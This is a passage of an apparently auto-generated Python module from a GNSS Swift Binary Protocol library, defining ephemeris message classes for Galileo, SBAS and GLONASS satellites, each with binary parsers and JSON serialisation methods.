self.omega0 = kwargs.pop('omega0')
self.omegadot = kwargs.pop('omegadot')
self.w = kwargs.pop('w')
self.inc = kwargs.pop('inc')
self.inc_dot = kwargs.pop('inc_dot')
self.af0 = kwargs.pop('af0')
self.af1 = kwargs.pop('af1')
self.af2 = kwargs.pop('af2')
self.toc = kwargs.pop('toc')
self.iode = kwargs.pop('iode')
self.iodc = kwargs.pop('iodc')
def __repr__(self):
return fmt_repr(self)
@staticmethod
def from_json(s):
"""Given a JSON-encoded string s, build a message object.
"""
d = json.loads(s)
return MsgEphemerisGalDepA.from_json_dict(d)
@staticmethod
def from_json_dict(d):
sbp = SBP.from_json_dict(d)
return MsgEphemerisGalDepA(sbp, **d)
def from_binary(self, d):
"""Given a binary payload d, update the appropriate payload fields of
the message.
"""
p = MsgEphemerisGalDepA._parser.parse(d)
for n in self.__class__.__slots__:
setattr(self, n, getattr(p, n))
def to_binary(self):
"""Produce a framed/packed SBP message.
"""
c = containerize(exclude_fields(self))
self.payload = MsgEphemerisGalDepA._parser.build(c)
return self.pack()
def into_buffer(self, buf, offset):
"""Produce a framed/packed SBP message into the provided buffer and offset.
"""
self.payload = containerize(exclude_fields(self))
self.parser = MsgEphemerisGalDepA._parser
self.stream_payload.reset(buf, offset)
return self.pack_into(buf, offset, self._build_payload)
def to_json_dict(self):
self.to_binary()
d = super( MsgEphemerisGalDepA, self).to_json_dict()
j = walk_json_dict(exclude_fields(self))
d.update(j)
return d
SBP_MSG_EPHEMERIS_GAL = 0x008D
class MsgEphemerisGal(SBP):
"""SBP class for message MSG_EPHEMERIS_GAL (0x008D).
You can have MSG_EPHEMERIS_GAL inherit its fields directly
from an inherited SBP object, or construct it inline using a dict
of its fields.
The ephemeris message returns a set of satellite orbit
parameters that is used to calculate Galileo satellite position,
velocity, and clock offset. Please see the Signal In Space ICD
OS SIS ICD, Issue 1.3, December 2016 for more details.
Parameters
----------
sbp : SBP
SBP parent object to inherit from.
common : EphemerisCommonContent
Values common for all ephemeris types
bgd_e1e5a : float
E1-E5a Broadcast Group Delay
bgd_e1e5b : float
E1-E5b Broadcast Group Delay
c_rs : float
Amplitude of the sine harmonic correction term to the orbit radius
c_rc : float
Amplitude of the cosine harmonic correction term to the orbit radius
c_uc : float
Amplitude of the cosine harmonic correction term to the argument of latitude
c_us : float
Amplitude of the sine harmonic correction term to the argument of latitude
c_ic : float
Amplitude of the cosine harmonic correction term to the angle of inclination
c_is : float
Amplitude of the sine harmonic correction term to the angle of inclination
dn : double
Mean motion difference
m0 : double
Mean anomaly at reference time
ecc : double
Eccentricity of satellite orbit
sqrta : double
Square root of the semi-major axis of orbit
omega0 : double
Longitude of ascending node of orbit plane at weekly epoch
omegadot : double
Rate of right ascension
w : double
Argument of perigee
inc : double
Inclination
inc_dot : double
Inclination first derivative
af0 : double
Polynomial clock correction coefficient (clock bias)
af1 : double
Polynomial clock correction coefficient (clock drift)
af2 : float
Polynomial clock correction coefficient (rate of clock drift)
toc : GPSTimeSec
Clock reference
iode : int
Issue of data (IODnav)
iodc : int
Issue of data (IODnav). Always equal to iode
source : int
0=I/NAV, 1=F/NAV
sender : int
Optional sender ID, defaults to SENDER_ID (see sbp/msg.py).
"""
_parser = construct.Struct(
'common' / construct.Struct(EphemerisCommonContent._parser),
'bgd_e1e5a' / construct.Float32l,
'bgd_e1e5b' / construct.Float32l,
'c_rs' / construct.Float32l,
'c_rc' / construct.Float32l,
'c_uc' / construct.Float32l,
'c_us' / construct.Float32l,
'c_ic' / construct.Float32l,
'c_is' / construct.Float32l,
'dn' / construct.Float64l,
'm0' / construct.Float64l,
'ecc' / construct.Float64l,
'sqrta' / construct.Float64l,
'omega0' / construct.Float64l,
'omegadot' / construct.Float64l,
'w' / construct.Float64l,
'inc' / construct.Float64l,
'inc_dot' / construct.Float64l,
'af0' / construct.Float64l,
'af1' / construct.Float64l,
'af2' / construct.Float32l,
'toc' / construct.Struct(GPSTimeSec._parser),
'iode' / construct.Int16ul,
'iodc' / construct.Int16ul,
'source' / construct.Int8ul,)
__slots__ = [
'common',
'bgd_e1e5a',
'bgd_e1e5b',
'c_rs',
'c_rc',
'c_uc',
'c_us',
'c_ic',
'c_is',
'dn',
'm0',
'ecc',
'sqrta',
'omega0',
'omegadot',
'w',
'inc',
'inc_dot',
'af0',
'af1',
'af2',
'toc',
'iode',
'iodc',
'source',
]
def __init__(self, sbp=None, **kwargs):
if sbp:
super( MsgEphemerisGal,
self).__init__(sbp.msg_type, sbp.sender, sbp.length,
sbp.payload, sbp.crc)
self.from_binary(sbp.payload)
else:
super( MsgEphemerisGal, self).__init__()
self.msg_type = SBP_MSG_EPHEMERIS_GAL
self.sender = kwargs.pop('sender', SENDER_ID)
self.common = kwargs.pop('common')
self.bgd_e1e5a = kwargs.pop('bgd_e1e5a')
self.bgd_e1e5b = kwargs.pop('bgd_e1e5b')
self.c_rs = kwargs.pop('c_rs')
self.c_rc = kwargs.pop('c_rc')
self.c_uc = kwargs.pop('c_uc')
self.c_us = kwargs.pop('c_us')
self.c_ic = kwargs.pop('c_ic')
self.c_is = kwargs.pop('c_is')
self.dn = kwargs.pop('dn')
self.m0 = kwargs.pop('m0')
self.ecc = kwargs.pop('ecc')
self.sqrta = kwargs.pop('sqrta')
self.omega0 = kwargs.pop('omega0')
self.omegadot = kwargs.pop('omegadot')
self.w = kwargs.pop('w')
self.inc = kwargs.pop('inc')
self.inc_dot = kwargs.pop('inc_dot')
self.af0 = kwargs.pop('af0')
self.af1 = kwargs.pop('af1')
self.af2 = kwargs.pop('af2')
self.toc = kwargs.pop('toc')
self.iode = kwargs.pop('iode')
self.iodc = kwargs.pop('iodc')
self.source = kwargs.pop('source')
def __repr__(self):
return fmt_repr(self)
@staticmethod
def from_json(s):
"""Given a JSON-encoded string s, build a message object.
"""
d = json.loads(s)
return MsgEphemerisGal.from_json_dict(d)
@staticmethod
def from_json_dict(d):
sbp = SBP.from_json_dict(d)
return MsgEphemerisGal(sbp, **d)
def from_binary(self, d):
"""Given a binary payload d, update the appropriate payload fields of
the message.
"""
p = MsgEphemerisGal._parser.parse(d)
for n in self.__class__.__slots__:
setattr(self, n, getattr(p, n))
def to_binary(self):
"""Produce a framed/packed SBP message.
"""
c = containerize(exclude_fields(self))
self.payload = MsgEphemerisGal._parser.build(c)
return self.pack()
def into_buffer(self, buf, offset):
"""Produce a framed/packed SBP message into the provided buffer and offset.
"""
self.payload = containerize(exclude_fields(self))
self.parser = MsgEphemerisGal._parser
self.stream_payload.reset(buf, offset)
return self.pack_into(buf, offset, self._build_payload)
def to_json_dict(self):
self.to_binary()
d = super( MsgEphemerisGal, self).to_json_dict()
j = walk_json_dict(exclude_fields(self))
d.update(j)
return d
SBP_MSG_EPHEMERIS_SBAS_DEP_A = 0x0082
class MsgEphemerisSbasDepA(SBP):
"""SBP class for message MSG_EPHEMERIS_SBAS_DEP_A (0x0082).
You can have MSG_EPHEMERIS_SBAS_DEP_A inherit its fields directly
from an inherited SBP object, or construct it inline using a dict
of its fields.
Parameters
----------
sbp : SBP
SBP parent object to inherit from.
common : EphemerisCommonContentDepA
Values common for all ephemeris types
pos : array
Position of the GEO at time toe
vel : array
Velocity of the GEO at time toe
acc : array
Acceleration of the GEO at time toe
a_gf0 : double
Time offset of the GEO clock w.r.t. SBAS Network Time
a_gf1 : double
Drift of the GEO clock w.r.t. SBAS Network Time
sender : int
Optional sender ID, defaults to SENDER_ID (see sbp/msg.py).
"""
_parser = construct.Struct(
'common' / construct.Struct(EphemerisCommonContentDepA._parser),
'pos' / construct.Array(3, construct.Float64l),
'vel' / construct.Array(3, construct.Float64l),
'acc' / construct.Array(3, construct.Float64l),
'a_gf0' / construct.Float64l,
'a_gf1' / construct.Float64l,)
__slots__ = [
'common',
'pos',
'vel',
'acc',
'a_gf0',
'a_gf1',
]
def __init__(self, sbp=None, **kwargs):
if sbp:
super( MsgEphemerisSbasDepA,
self).__init__(sbp.msg_type, sbp.sender, sbp.length,
sbp.payload, sbp.crc)
self.from_binary(sbp.payload)
else:
super( MsgEphemerisSbasDepA, self).__init__()
self.msg_type = SBP_MSG_EPHEMERIS_SBAS_DEP_A
self.sender = kwargs.pop('sender', SENDER_ID)
self.common = kwargs.pop('common')
self.pos = kwargs.pop('pos')
self.vel = kwargs.pop('vel')
self.acc = kwargs.pop('acc')
self.a_gf0 = kwargs.pop('a_gf0')
self.a_gf1 = kwargs.pop('a_gf1')
def __repr__(self):
return fmt_repr(self)
@staticmethod
def from_json(s):
"""Given a JSON-encoded string s, build a message object.
"""
d = json.loads(s)
return MsgEphemerisSbasDepA.from_json_dict(d)
@staticmethod
def from_json_dict(d):
sbp = SBP.from_json_dict(d)
return MsgEphemerisSbasDepA(sbp, **d)
def from_binary(self, d):
"""Given a binary payload d, update the appropriate payload fields of
the message.
"""
p = MsgEphemerisSbasDepA._parser.parse(d)
for n in self.__class__.__slots__:
setattr(self, n, getattr(p, n))
def to_binary(self):
"""Produce a framed/packed SBP message.
"""
c = containerize(exclude_fields(self))
self.payload = MsgEphemerisSbasDepA._parser.build(c)
return self.pack()
def into_buffer(self, buf, offset):
"""Produce a framed/packed SBP message into the provided buffer and offset.
"""
self.payload = containerize(exclude_fields(self))
self.parser = MsgEphemerisSbasDepA._parser
self.stream_payload.reset(buf, offset)
return self.pack_into(buf, offset, self._build_payload)
def to_json_dict(self):
self.to_binary()
d = super( MsgEphemerisSbasDepA, self).to_json_dict()
j = walk_json_dict(exclude_fields(self))
d.update(j)
return d
SBP_MSG_EPHEMERIS_GLO_DEP_A = 0x0083
class MsgEphemerisGloDepA(SBP):
"""SBP class for message MSG_EPHEMERIS_GLO_DEP_A (0x0083).
You can have MSG_EPHEMERIS_GLO_DEP_A inherit its fields directly
from an inherited SBP object, or construct it inline using a dict
of its fields.
The ephemeris message returns a set of satellite orbit
parameters that is used to calculate GLO satellite position,
velocity, and clock offset. Please see the GLO ICD 5.1 "Table 4.5
Characteristics of words of immediate information (ephemeris parameters)"
for more details.
Parameters
----------
sbp : SBP
SBP parent object to inherit from.
common : EphemerisCommonContentDepA
Values common for all ephemeris types
gamma : double
Relative deviation of predicted carrier frequency from nominal
tau : double
Correction to the SV time
pos : array
Position of the SV at tb in PZ-90.02 coordinates system
vel : array
Velocity vector of the SV at tb in PZ-90.02 coordinates system
acc : array
Acceleration vector of the SV at tb in PZ-90.02 coordinates sys
sender : int
Optional sender ID, defaults to SENDER_ID (see sbp/msg.py).
"""
_parser = construct.Struct(
'common' / construct.Struct(EphemerisCommonContentDepA._parser),
'gamma' / construct.Float64l,
'tau' / construct.Float64l,
'pos' / construct.Array(3, construct.Float64l),
'vel' / construct.Array(3, construct.Float64l),
'acc' / construct.Array(3, construct.Float64l),)
__slots__ = [
'common',
'gamma',
'tau',
'pos',
'vel',
'acc',
]
def __init__(self, sbp=None, **kwargs):
if sbp:
super( MsgEphemerisGloDepA,
self).__init__(sbp.msg_type, sbp.sender, sbp.length,
sbp.payload, sbp.crc)
self.from_binary(sbp.payload)
else:
super( MsgEphemerisGloDepA, self).__init__()
self.msg_type = SBP_MSG_EPHEMERIS_GLO_DEP_A
self.sender = kwargs.pop('sender', SENDER_ID)
self.common = kwargs.pop('common')
self.gamma = kwargs.pop('gamma')
self.tau = kwargs.pop('tau')
self.pos = kwargs.pop('pos')
self.vel = kwargs.pop('vel')
self.acc = kwargs.pop('acc')
def __repr__(self):
return fmt_repr(self)
@staticmethod
def from_json(s):
"""Given a JSON-encoded string s, build a message object.
"""
d = json.loads(s)
return MsgEphemerisGloDepA.from_json_dict(d)
@staticmethod
def from_json_dict(d):
sbp = SBP.from_json_dict(d)
return MsgEphemerisGloDepA(sbp, **d)
def from_binary(self, d):
"""Given a binary payload d, update the appropriate payload fields of
the message.
"""
p = MsgEphemerisGloDepA._parser.parse(d)
for n in self.__class__.__slots__:
setattr(self, n, getattr(p, n))
def to_binary(self):
"""Produce a framed/packed SBP message.
"""
c = containerize(exclude_fields(self))
self.payload = MsgEphemerisGloDepA._parser.build(c)
return self.pack()
def into_buffer(self, buf, offset):
"""Produce a framed/packed SBP message into the provided buffer and offset.
"""
self.payload = containerize(exclude_fields(self))
self.parser = MsgEphemerisGloDepA._parser
self.stream_payload.reset(buf, offset)
return self.pack_into(buf, offset, self._build_payload)
def to_json_dict(self):
self.to_binary()
d = super( MsgEphemerisGloDepA, self).to_json_dict()
j = walk_json_dict(exclude_fields(self))
d.update(j)
return d
SBP_MSG_EPHEMERIS_SBAS_DEP_B = 0x0084
class MsgEphemerisSbasDepB(SBP):
"""SBP class for message MSG_EPHEMERIS_SBAS_DEP_B (0x0084).
You can have MSG_EPHEMERIS_SBAS_DEP_B inherit its fields directly
from an inherited SBP object, or construct it inline using a dict
of its fields.
This observation message has been deprecated in favor of
ephemeris message using floats for size reduction.
Parameters
----------
sbp : SBP
SBP parent object to inherit from.
common : EphemerisCommonContentDepB
Values common for all ephemeris types
pos : array
Position of the GEO at time toe
vel : array
Velocity of the GEO at time toe
acc : array
Acceleration of the GEO at time toe
a_gf0 : double
Time offset of the GEO clock w.r.t. SBAS Network Time
a_gf1 : double
Drift of the GEO clock w.r.t. SBAS Network Time
sender : int
Optional sender ID, defaults to SENDER_ID (see sbp/msg.py).
"""
_parser = construct.Struct(
'common' / construct.Struct(EphemerisCommonContentDepB._parser),
'pos' / construct.Array(3, construct.Float64l),
'vel' / construct.Array(3, construct.Float64l),
'acc' / construct.Array(3, construct.Float64l),
'a_gf0' / construct.Float64l,
'a_gf1' / construct.Float64l,)
__slots__ = [
'common',
'pos',
'vel',
'acc',
'a_gf0',
'a_gf1',
]
def __init__(self, sbp=None, **kwargs):
if sbp:
super( MsgEphemerisSbasDepB,
self).__init__(sbp.msg_type, sbp.sender, sbp.length,
sbp.payload, sbp.crc)
self.from_binary(sbp.payload)
else:
super( MsgEphemerisSbasDepB, self).__init__()
self.msg_type = SBP_MSG_EPHEMERIS_SBAS_DEP_B
self.sender = kwargs.pop('sender', SENDER_ID)
self.common = kwargs.pop('common')
self.pos = kwargs.pop('pos')
self.vel = kwargs.pop('vel')
self.acc = kwargs.pop('acc')
self.a_gf0 = kwargs.pop('a_gf0')
self.a_gf1 = kwargs.pop('a_gf1')
def __repr__(self):
return fmt_repr(self)
@staticmethod
def from_json(s):
"""Given a JSON-encoded string s, build a message object.
"""
d = json.loads(s)
return MsgEphemerisSbasDepB.from_json_dict(d)
@staticmethod
def from_json_dict(d):
sbp = SBP.from_json_dict(d)
return MsgEphemerisSbasDepB(sbp, **d)
def from_binary(self, d):
"""Given a binary payload d, update the appropriate payload fields of
the message.
"""
p = MsgEphemerisSbasDepB._parser.parse(d)
for n in self.__class__.__slots__:
setattr(self, n, getattr(p, n))
def to_binary(self):
"""Produce a framed/packed SBP message.
"""
c = containerize(exclude_fields(self))
self.payload = MsgEphemerisSbasDepB._parser.build(c)
return self.pack()
def into_buffer(self, buf, offset):
"""Produce a framed/packed SBP message into the provided buffer and offset.
"""
self.payload = containerize(exclude_fields(self))
self.parser = MsgEphemerisSbasDepB._parser
self.stream_payload.reset(buf, offset)
return self.pack_into(buf, offset, self._build_payload)
def to_json_dict(self):
self.to_binary()
d = super( MsgEphemerisSbasDepB, self).to_json_dict()
j = walk_json_dict(exclude_fields(self))
d.update(j)
return d
SBP_MSG_EPHEMERIS_SBAS = 0x008C
class MsgEphemerisSbas(SBP):
"""SBP class for message MSG_EPHEMERIS_SBAS (0x008C).
You can have MSG_EPHEMERIS_SBAS inherit its fields directly
from an inherited SBP object, or construct it inline using a dict
of its fields.
Parameters
----------
sbp : SBP
SBP parent object to inherit from.
common : EphemerisCommonContent
Values common for all ephemeris types
pos : array
Position of the GEO at time toe
vel : array
Velocity of the GEO at time toe
acc : array
Acceleration of the GEO at time toe
a_gf0 : float
Time offset of the GEO clock w.r.t. SBAS Network Time
a_gf1 : float
Drift of the GEO clock w.r.t. SBAS Network Time
sender : int
Optional sender ID, defaults to SENDER_ID (see sbp/msg.py).
"""
_parser = construct.Struct(
'common' / construct.Struct(EphemerisCommonContent._parser),
'pos' / construct.Array(3, construct.Float64l),
'vel' / construct.Array(3, construct.Float32l),
'acc' / construct.Array(3, construct.Float32l),
'a_gf0' / construct.Float32l,
'a_gf1' / construct.Float32l,)
__slots__ = [
'common',
'pos',
'vel',
'acc',
'a_gf0',
'a_gf1',
]
def __init__(self, sbp=None, **kwargs):
if sbp:
super( MsgEphemerisSbas,
self).__init__(sbp.msg_type, sbp.sender, sbp.length,
sbp.payload, sbp.crc)
self.from_binary(sbp.payload)
else:
super( MsgEphemerisSbas, self).__init__()
self.msg_type = SBP_MSG_EPHEMERIS_SBAS
self.sender = kwargs.pop('sender', SENDER_ID)
self.common = kwargs.pop('common')
self.pos = kwargs.pop('pos')
self.vel = kwargs.pop('vel')
self.acc = kwargs.pop('acc')
self.a_gf0 = kwargs.pop('a_gf0')
self.a_gf1 = kwargs.pop('a_gf1')
def __repr__(self):
return fmt_repr(self)
@staticmethod
def from_json(s):
"""Given a JSON-encoded string s, build a message object.
"""
d = json.loads(s)
return MsgEphemerisSbas.from_json_dict(d)
@staticmethod
def from_json_dict(d):
sbp = SBP.from_json_dict(d)
return MsgEphemerisSbas(sbp, **d)
def from_binary(self, d):
"""Given a binary payload d, update the appropriate payload fields of
the message.
"""
p = MsgEphemerisSbas._parser.parse(d)
for n in self.__class__.__slots__:
setattr(self, n, getattr(p, n))
def to_binary(self):
"""Produce a framed/packed SBP message.
"""
c = containerize(exclude_fields(self))
self.payload = MsgEphemerisSbas._parser.build(c)
return self.pack()
def into_buffer(self, buf, offset):
"""Produce a framed/packed SBP message into the provided buffer and offset.
"""
self.payload = containerize(exclude_fields(self))
self.parser = MsgEphemerisSbas._parser
self.stream_payload.reset(buf, offset)
return self.pack_into(buf, offset, self._build_payload)
def to_json_dict(self):
self.to_binary()
d = super( MsgEphemerisSbas, self).to_json_dict()
j = walk_json_dict(exclude_fields(self))
d.update(j)
return d
SBP_MSG_EPHEMERIS_GLO_DEP_B = 0x0085
class MsgEphemerisGloDepB(SBP):
"""SBP class for message MSG_EPHEMERIS_GLO_DEP_B (0x0085).
You can have MSG_EPHEMERIS_GLO_DEP_B inherit its fields directly
from an inherited SBP object, or construct it inline using a dict
of its fields.
The ephemeris message returns a set of satellite orbit
parameters that is used to calculate GLO satellite position,
velocity, and clock offset. Please see the GLO ICD 5.1 "Table 4.5
Characteristics of words of immediate information (ephemeris parameters)"
for more details.
Parameters
----------
sbp : SBP
SBP parent object to inherit from.
common : EphemerisCommonContentDepB
Values common for all ephemeris types
gamma : double
Relative deviation of predicted carrier frequency from nominal
tau : double
Correction to the SV time
pos : array
Position of the SV at tb in PZ-90.02 coordinates system
vel : array
Velocity vector of the SV at tb in PZ-90.02 coordinates system
acc : array
Acceleration vector of the SV at tb in PZ-90.02 coordinates sys
sender : int
Optional sender ID, defaults to SENDER_ID (see sbp/msg.py).
"""
_parser = construct.Struct(
'common' / construct.Struct(EphemerisCommonContentDepB._parser),
'gamma' / construct.Float64l,
'tau' / construct.Float64l,
'pos' / construct.Array(3, construct.Float64l),
'vel' / construct.Array(3, construct.Float64l),
'acc' / construct.Array(3, construct.Float64l),)
__slots__ = [
'common',
'gamma',
'tau',
'pos',
'vel',
'acc',
]
def __init__(self, sbp=None, **kwargs):
if sbp:
super( MsgEphemerisGloDepB,
self).__init__(sbp.msg_type, sbp.sender, sbp.length,
sbp.payload, sbp.crc)
self.from_binary(sbp.payload)
else:
super( MsgEphemerisGloDepB, self).__init__()
self.msg_type = SBP_MSG_EPHEMERIS_GLO_DEP_B
self.sender = kwargs.pop('sender', SENDER_ID)
self.common = kwargs.pop('common')
self.gamma = kwargs.pop('gamma')
self.tau = kwargs.pop('tau')
self.pos = kwargs.pop('pos')
self.vel = kwargs.pop('vel')
self.acc = kwargs.pop('acc')
def __repr__(self):
return fmt_repr(self)
@staticmethod
def from_json(s):
"""Given a JSON-encoded string s, build a message object.
"""
d = json.loads(s)
return MsgEphemerisGloDepB.from_json_dict(d)
@staticmethod
def from_json_dict(d):
sbp = SBP.from_json_dict(d)
return MsgEphemerisGloDepB(sbp, **d)
def from_binary(self, d):
"""Given a binary payload d, update the appropriate payload fields of
the message.
"""
p = MsgEphemerisGloDepB._parser.parse(d)
for n in self.__class__.__slots__:
setattr(self, n, getattr(p, n))
def to_binary(self):
"""Produce a framed/packed SBP message.
"""
c = containerize(exclude_fields(self))
self.payload = MsgEphemerisGloDepB._parser.build(c)
return self.pack()
def into_buffer(self, buf, offset):
"""Produce a framed/packed SBP message into the provided buffer and offset.
"""
self.payload = containerize(exclude_fields(self))
self.parser = MsgEphemerisGloDepB._parser
self.stream_payload.reset(buf, offset)
return self.pack_into(buf, offset, self._build_payload)
def to_json_dict(self):
self.to_binary()
d = super( MsgEphemerisGloDepB, self).to_json_dict()
j = walk_json_dict(exclude_fields(self))
d.update(j)
return d
SBP_MSG_EPHEMERIS_GLO_DEP_C = 0x0087
class MsgEphemerisGloDepC(SBP):
"""SBP class for message MSG_EPHEMERIS_GLO_DEP_C (0x0087).
You can have MSG_EPHEMERIS_GLO_DEP_C inherit its fields directly
from an inherited SBP object, or construct it inline using a dict
of its fields.
The ephemeris message returns a set of satellite orbit
parameters that is used to calculate GLO satellite position,
velocity, and clock offset. Please see the GLO ICD 5.1 "Table 4.5
Characteristics of words of immediate information (ephemeris parameters)"
for more details.
Parameters
----------
sbp : SBP
SBP parent object to inherit from.
common : EphemerisCommonContentDepB
Values common for all ephemeris types
gamma : double
Relative deviation of predicted carrier frequency from nominal
tau : double
Correction to the SV time
d_tau : double
Equipment delay between L1 and L2
pos : array
Position of the SV at tb in PZ-90.02 coordinates system
vel : array
Velocity vector of the SV at tb in PZ-90.02 coordinates system
acc : array
Acceleration vector of the SV at tb in PZ-90.02 coordinates sys
fcn : int
Frequency slot. FCN+8 (that is [1..14]). 0 or 0xFF for invalid
sender : int
Optional sender ID, defaults to SENDER_ID (see sbp/msg.py).
"""
_parser = construct.Struct(
'common' / construct.Struct(EphemerisCommonContentDepB._parser),
'gamma' / construct.Float64l,
'tau' / construct.Float64l,
'd_tau' / construct.Float64l,
'pos' / construct.Array(3, construct.Float64l),
'vel' / construct.Array(3, construct.Float64l),
'acc' / construct.Array(3, construct.Float64l),
'fcn' / construct.Int8ul,)
__slots__ = [
'common',
'gamma',
'tau',
'd_tau',
'pos',
'vel',
'acc',
'fcn',
]
def __init__(self, sbp=None, **kwargs):
if sbp:
super( MsgEphemerisGloDepC,
self).__init__(sbp.msg_type, sbp.sender, sbp.length,
sbp.payload, sbp.crc)
self.from_binary(sbp.payload)
else:
super( MsgEphemerisGloDepC, self).__init__()
self.msg_type = SBP_MSG_EPHEMERIS_GLO_DEP_C
self.sender = kwargs.pop('sender', SENDER_ID)
self.common = kwargs.pop('common')
self.gamma = kwargs.pop('gamma')
self.tau = kwargs.pop('tau')
self.d_tau = kwargs.pop('d_tau')
self.pos = kwargs.pop('pos')
self.vel = kwargs.pop('vel')
self.acc = kwargs.pop('acc')
self.fcn = kwargs.pop('fcn')
def __repr__(self):
return fmt_repr(self)
@staticmethod
def from_json(s):
"""Given a JSON-encoded string s, build a message object.
"""
d = json.loads(s)
return MsgEphemerisGloDepC.from_json_dict(d)
@staticmethod
def from_json_dict(d):
sbp = SBP.from_json_dict(d)
return MsgEphemerisGloDepC(sbp, **d)
def from_binary(self, d):
"""Given a binary payload d, update the appropriate payload fields of
the message.
"""
p = MsgEphemerisGloDepC._parser.parse(d)
for n in self.__class__.__slots__:
setattr(self, n, getattr(p, n))
def to_binary(self):
"""Produce a framed/packed SBP message.
"""
c = containerize(exclude_fields(self))
self.payload = MsgEphemerisGloDepC._parser.build(c)
return self.pack()
def into_buffer(self, buf, offset):
"""Produce a framed/packed SBP message into the provided buffer and offset.
"""
self.payload = containerize(exclude_fields(self))
self.parser = MsgEphemerisGloDepC._parser
self.stream_payload.reset(buf, offset)
return self.pack_into(buf, offset, self._build_payload)
def to_json_dict(self):
self.to_binary()
d = super( MsgEphemerisGloDepC, self).to_json_dict()
j = walk_json_dict(exclude_fields(self))
d.update(j)
return d
SBP_MSG_EPHEMERIS_GLO_DEP_D = 0x0088
class MsgEphemerisGloDepD(SBP):
"""SBP class for message MSG_EPHEMERIS_GLO_DEP_D (0x0088).
You can have MSG_EPHEMERIS_GLO_DEP_D inherit its fields directly
from an inherited SBP object, or construct it inline using a dict
of its fields.
This observation message has been deprecated in favor of
ephemeris message using floats for size reduction.
Parameters
----------
sbp : SBP
SBP parent object to inherit from.
common : EphemerisCommonContentDepB
Values common for all ephemeris types
gamma : double
Relative deviation of predicted carrier frequency from nominal
tau : double
Correction to the SV time
d_tau : double
Equipment delay between L1 and L2
pos : array
Position of the SV at tb in PZ-90.02 coordinates system
vel : array
Velocity vector of the SV at tb in PZ-90.02 coordinates system
acc : array
Acceleration vector of the SV at tb in PZ-90.02 coordinates sys
fcn : int
Frequency slot. FCN+8 (that is [1..14]). 0 or 0xFF for invalid
iod : int
Issue of data. Equal to the 7 bits of the immediate data word t_b
sender : int
Optional sender ID, defaults to SENDER_ID (see sbp/msg.py).
"""
_parser = construct.Struct(
'common' / construct.Struct(EphemerisCommonContentDepB._parser),
'gamma' / construct.Float64l,
'tau' / construct.Float64l,
'd_tau' / construct.Float64l,
'pos' / construct.Array(3, construct.Float64l),
'vel' / construct.Array(3, construct.Float64l),
'acc' / construct.Array(3, construct.Float64l),
'fcn' / construct.Int8ul,
'iod' / construct.Int8ul,)
__slots__ = [
'common',
'gamma',
'tau',
'd_tau',
'pos',
'vel',
'acc',
'fcn',
'iod',
]
def __init__(self, sbp=None, **kwargs):
if sbp:
super( MsgEphemerisGloDepD,
self).__init__(sbp.msg_type, sbp.sender, sbp.length,
sbp.payload, sbp.crc)
self.from_binary(sbp.payload)
else:
super( MsgEphemerisGloDepD, self).__init__()
self.msg_type = SBP_MSG_EPHEMERIS_GLO_DEP_D
self.sender = kwargs.pop('sender', SENDER_ID)
self.common = kwargs.pop('common')
self.gamma = kwargs.pop('gamma')
self.tau = kwargs.pop('tau')
self.d_tau = kwargs.pop('d_tau')
self.pos = kwargs.pop('pos')
self.vel = kwargs.pop('vel')
self.acc = kwargs.pop('acc')
self.fcn = kwargs.pop('fcn')
self.iod = kwargs.pop('iod')
def __repr__(self):
return fmt_repr(self)
@staticmethod
def from_json(s):
"""Given a JSON-encoded string s, build a message object.
"""
d = json.loads(s)
return MsgEphemerisGloDepD.from_json_dict(d)
@staticmethod
def from_json_dict(d):
sbp = SBP.from_json_dict(d)
return MsgEphemerisGloDepD(sbp, **d)
def from_binary(self, d):
"""Given a binary payload d, update the appropriate payload fields of
the message.
"""
p = MsgEphemerisGloDepD._parser.parse(d)
for n in self.__class__.__slots__:
setattr(self, n, getattr(p, n))
def to_binary(self):
"""Produce a framed/packed SBP message.
"""
c = containerize(exclude_fields(self))
self.payload = MsgEphemerisGloDepD._parser.build(c)
return self.pack()
def into_buffer(self, buf, offset):
"""Produce a framed/packed SBP message into the provided buffer and offset.
"""
self.payload = containerize(exclude_fields(self))
self.parser = MsgEphemerisGloDepD._parser
self.stream_payload.reset(buf, offset)
return self.pack_into(buf, offset, self._build_payload)
def to_json_dict(self):
self.to_binary()
d = super( MsgEphemerisGloDepD, self).to_json_dict()
j = walk_json_dict(exclude_fields(self))
d.update(j)
return d
SBP_MSG_EPHEMERIS_GLO = 0x008B
class MsgEphemerisGlo(SBP):
"""SBP class for message MSG_EPHEMERIS_GLO (0x008B).
You can have MSG_EPHEMERIS_GLO inherit its fields directly
from an inherited SBP object, or construct it inline using a dict
of its fields.
The ephemeris message returns a set of satellite orbit
parameters that is used to calculate GLO satellite position,
velocity, and clock offset. Please see the GLO ICD 5.1 "Table 4.5
Characteristics of words of immediate information (ephemeris parameters)"
for more details.
Parameters
----------
sbp : SBP
SBP parent object to inherit from.
common : EphemerisCommonContent
Values common for all ephemeris types
gamma : float
Relative deviation of predicted carrier frequency from nominal
tau : float
Correction to the SV time
d_tau : float
Equipment delay between L1 and L2
pos : array
Position of the SV at tb in PZ-90.02 coordinates system
vel : array
Velocity vector of the SV at tb in PZ-90.02 coordinates system
acc : array
Acceleration vector of the SV at tb in PZ-90.02 coordinates sys
fcn : int
Frequency slot. FCN+8 (that is [1..14]). 0 or 0xFF for invalid
iod : int
Issue of data. Equal to the 7 bits of the immediate data word t_b
sender : int
Optional sender ID, defaults to SENDER_ID (see sbp/msg.py).
"""
_parser = construct.Struct(
'common' / construct.Struct(EphemerisCommonContent._parser),
'gamma' / construct.Float32l,
'tau' / construct.Float32l,
'd_tau' / construct.Float32l,
'pos' / construct.Array(3, construct.Float64l),
'vel' / construct.Array(3, construct.Float64l),
'acc' / construct.Array(3, construct.Float32l),
'fcn' / construct.Int8ul,
'iod' / construct.Int8ul,)
__slots__ = [
'common',
'gamma',
'tau',
'd_tau',
'pos',
'vel',
'acc',
'fcn',
'iod',
]
def __init__(self, sbp=None, **kwargs):
if sbp:
super( MsgEphemerisGlo,
self).__init__(sbp.msg_type, sbp.sender, sbp.length,
sbp.payload, sbp.crc)
self.from_binary(sbp.payload)
else:
super( MsgEphemerisGlo, self).__init__()
self.msg_type = SBP_MSG_EPHEMERIS_GLO
self.sender = kwargs.pop('sender', SENDER_ID)
self.common = kwargs.pop('common')
self.gamma = kwargs.pop('gamma')
self.tau = kwargs.pop('tau')
self.d_tau = kwargs.pop('d_tau')
self.pos = kwargs.pop('pos')
self.vel = kwargs.pop('vel')
self.acc = kwargs.pop('acc')
self.fcn = kwargs.pop('fcn')
self.iod = kwargs.pop('iod')
def __repr__(self):
return fmt_repr(self)
@staticmethod
def from_json(s):
